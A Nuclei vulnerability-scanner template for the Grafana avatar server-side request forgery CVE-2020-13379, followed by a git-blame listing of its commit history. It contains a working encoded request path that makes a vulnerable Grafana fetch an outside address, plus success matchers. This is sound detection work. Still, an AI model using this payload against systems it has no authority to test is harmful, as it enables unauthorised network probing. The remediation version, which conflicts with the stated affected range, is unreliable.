nuclei-templates/http/cves/2020/CVE-2020-13379.yaml

id: CVE-2020-13379

info:
  name: Grafana 3.0.1-7.0.1 - Server-Side Request Forgery
  author: Joshua Rogers
  severity: high
  description: |
    Grafana 3.0.1 through 7.0.1 is susceptible to server-side request forgery via the avatar feature, which can lead to remote code execution. Any unauthenticated user/client can make Grafana send HTTP requests to any URL and return its result. This can be used to gain information about the network Grafana is running on, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  remediation: Upgrade to 6.3.4 or higher.
  reference:
    - https://github.com/advisories/GHSA-wc9w-wvq2-ffm9
    - https://github.com/grafana/grafana/commit/ba953be95f0302c2ea80d23f1e5f2c1847365192
    - http://www.openwall.com/lists/oss-security/2020/06/03/4
    - https://nvd.nist.gov/vuln/detail/CVE-2020-13379
    - http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00060.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
    cvss-score: 8.2
    cve-id: CVE-2020-13379
    cwe-id: CWE-918
    epss-score: 0.25457
    epss-percentile: 0.96123
    cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: grafana
    product: grafana
    shodan-query: title:"Grafana"
  tags: cve,cve2020,grafana,ssrf

http:
  - method: GET
    path:
      - "{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1"
      - "{{BaseURL}}/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "cloudflare.com"
          - "dns"
        condition: and

      - type: word
        part: header
        words:
          - "image/jpeg"

      - type: status
        status:
          - 200
Add check for CVE-2020-13379: Grafana 3.0.1 <= 7.0.1 Server Side Request Forgery. Unfortunately, interactsh cannot be used here because Grafana has a low timeout for connecting to other services. Thus, we use the low-latency website https://1.1.1.1/, which Cloudflare provides for advertising its DNS service. It should be low enough latency that it is a good indicator of a vulnerability. 2022-12-08 00:39:09 +00:00			`id: CVE-2020-13379`

			`info:`
Enhancement: cves/2020/CVE-2020-13379.yaml by md 2023-04-12 18:18:06 +00:00			`name: Grafana 3.0.1-7.0.1 - Server-Side Request Forgery`
Add check for CVE-2020-13379: Grafana 3.0.1 <= 7.0.1 Server Side Request Forgery. Unfortunately, interactsh cannot be used here because Grafana has a low timeout for connecting to other services. Thus, we use the low-latency website https://1.1.1.1/, which Cloudflare provides for advertising its DNS service. It should be low enough latency that it is a good indicator of a vulnerability. 2022-12-08 00:39:09 +00:00			`author: Joshua Rogers`
			`severity: high`
Update CVE-2020-13379.yaml 2022-12-08 05:36:13 +00:00			`description: \|`
Enhancement: cves/2020/CVE-2020-13379.yaml by md 2023-04-12 18:18:06 +00:00			`Grafana 3.0.1 through 7.0.1 is susceptible to server-side request forgery via the avatar feature, which can lead to remote code execution. Any unauthenticated user/client can make Grafana send HTTP requests to any URL and return its result. This can be used to gain information about the network Grafana is running on, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.`
updated 2020 CVEs 2023-09-06 12:22:36 +00:00			`remediation: Upgrade to 6.3.4 or higher.`
Add check for CVE-2020-13379: Grafana 3.0.1 <= 7.0.1 Server Side Request Forgery. Unfortunately, interactsh cannot be used here because Grafana has a low timeout for connecting to other services. Thus, we use the low-latency website https://1.1.1.1/, which Cloudflare provides for advertising its DNS service. It should be low enough latency that it is a good indicator of a vulnerability. 2022-12-08 00:39:09 +00:00			`reference:`
			`- https://github.com/advisories/GHSA-wc9w-wvq2-ffm9`
			`- https://github.com/grafana/grafana/commit/ba953be95f0302c2ea80d23f1e5f2c1847365192`
Auto Generated CVE annotations [Mon Apr 3 09:07:37 UTC 2023] :robot: 2023-04-03 09:07:37 +00:00			`- http://www.openwall.com/lists/oss-security/2020/06/03/4`
Enhancement: cves/2020/CVE-2020-13379.yaml by md 2023-04-12 18:18:06 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2020-13379`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00060.html`
Add check for CVE-2020-13379: Grafana 3.0.1 <= 7.0.1 Server Side Request Forgery. Unfortunately, interactsh cannot be used here because Grafana has a low timeout for connecting to other services. Thus, we use the low-latency website https://1.1.1.1/, which Cloudflare provides for advertising its DNS service. It should be low enough latency that it is a good indicator of a vulnerability. 2022-12-08 00:39:09 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H`
			`cvss-score: 8.2`
			`cve-id: CVE-2020-13379`
			`cwe-id: CWE-918`
templateman update 2023-10-14 11:27:55 +00:00			`epss-score: 0.25457`
TemplateMan Update [Mon Oct 16 10:55:13 UTC 2023] :robot: 2023-10-16 10:55:14 +00:00			`epss-percentile: 0.96123`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`cpe: cpe:2.3:a:grafana:grafana::::::::`
Add check for CVE-2020-13379: Grafana 3.0.1 <= 7.0.1 Server Side Request Forgery. Unfortunately, interactsh cannot be used here because Grafana has a low timeout for connecting to other services. Thus, we use the low-latency website https://1.1.1.1/, which Cloudflare provides for advertising its DNS service. It should be low enough latency that it is a good indicator of a vulnerability. 2022-12-08 00:39:09 +00:00			`metadata:`
updated 2020 CVEs 2023-09-06 12:22:36 +00:00			`verified: true`
TemplateMan Update [Fri Sep 1 02:54:41 UTC 2023] :robot: 2023-09-01 02:54:41 +00:00			`max-request: 2`
updated 2020 CVEs 2023-09-06 12:22:36 +00:00			`vendor: grafana`
TemplateMan Update [Fri Sep 1 02:54:41 UTC 2023] :robot: 2023-09-01 02:54:41 +00:00			`product: grafana`
Add check for CVE-2020-13379: Grafana 3.0.1 <= 7.0.1 Server Side Request Forgery. Unfortunately, interactsh cannot be used here because Grafana has a low timeout for connecting to other services. Thus, we use the low-latency website https://1.1.1.1/, which Cloudflare provides for advertising its DNS service. It should be low enough latency that it is a good indicator of a vulnerability. 2022-12-08 00:39:09 +00:00			`shodan-query: title:"Grafana"`
			`tags: cve,cve2020,grafana,ssrf`

Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Add check for CVE-2020-13379: Grafana 3.0.1 <= 7.0.1 Server Side Request Forgery. Unfortunately, interactsh cannot be used here because Grafana has a low timeout for connecting to other services. Thus, we use the low-latency website https://1.1.1.1/, which Cloudflare provides for advertising its DNS service. It should be low enough latency that it is a good indicator of a vulnerability. 2022-12-08 00:39:09 +00:00			`- method: GET`
			`path:`
			`- "{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1"`
Adding one more path in CVE-2020-13379.yaml 2023-08-31 17:38:16 +00:00			`- "{{BaseURL}}/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1"`
Add check for CVE-2020-13379: Grafana 3.0.1 <= 7.0.1 Server Side Request Forgery. Unfortunately, interactsh cannot be used here because Grafana has a low timeout for connecting to other services. Thus, we use the low-latency website https://1.1.1.1/, which Cloudflare provides for advertising its DNS service. It should be low enough latency that it is a good indicator of a vulnerability. 2022-12-08 00:39:09 +00:00
Adding one more path in CVE-2020-13379.yaml 2023-08-31 17:38:16 +00:00			`stop-at-first-match: true`
updated 2020 CVEs 2023-09-06 12:22:36 +00:00
Add check for CVE-2020-13379: Grafana 3.0.1 <= 7.0.1 Server Side Request Forgery. Unfortunately, interactsh cannot be used here because Grafana has a low timeout for connecting to other services. Thus, we use the low-latency website https://1.1.1.1/, which Cloudflare provides for advertising its DNS service. It should be low enough latency that it is a good indicator of a vulnerability. 2022-12-08 00:39:09 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
Update CVE-2020-13379.yaml 2022-12-08 05:29:30 +00:00			`part: body`
Add check for CVE-2020-13379: Grafana 3.0.1 <= 7.0.1 Server Side Request Forgery. Unfortunately, interactsh cannot be used here because Grafana has a low timeout for connecting to other services. Thus, we use the low-latency website https://1.1.1.1/, which Cloudflare provides for advertising its DNS service. It should be low enough latency that it is a good indicator of a vulnerability. 2022-12-08 00:39:09 +00:00			`words:`
			`- "cloudflare.com"`
			`- "dns"`
			`condition: and`
Update CVE-2020-13379.yaml 2022-12-08 05:29:30 +00:00
			`- type: word`
			`part: header`
			`words:`
			`- "image/jpeg"`

			`- type: status`
			`status:`
Enhancement: cves/2020/CVE-2020-13379.yaml by md 2023-04-12 18:18:06 +00:00			`- 200`